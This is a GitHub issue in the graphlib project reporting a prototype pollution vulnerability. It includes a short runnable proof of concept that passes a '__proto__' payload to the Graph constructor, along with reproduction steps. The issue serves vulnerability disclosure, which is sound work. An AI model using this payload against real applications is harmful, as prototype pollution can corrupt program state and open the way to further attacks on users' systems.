Skip to content

Prototype Pollution in graphlib #230

Open
Open
Prototype Pollution in graphlib#230
@dfzysmy2tf-create

Description

@dfzysmy2tf-create
dfzysmy2tf-create
opened on Apr 13, 2026

hi, we are a security team. We found a Prototype Pollution vulnerability in your project.
Vulnerability Type
Prototype Pollution
Vulnerability Cause
When creating graphs, nodes, and edges, graphlib deeply merges user-supplied config without filtering proto, causing global prototype pollution.
Vulnerable Code Location
Graph constructor, config-merging functions, and setDefault related methods.
POC (Runnable Directly)
javascript

const graphlib = require('graphlib');
const evil = {"__proto__":{"inject":"success"}};

const g = new graphlib.Graph(evil);
console.log({}.inject); // Output: success

Reproduction Steps
Install: npm i graphlib
Create poc.js and paste code
Run: node poc.js
Output success confirms exploitation

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions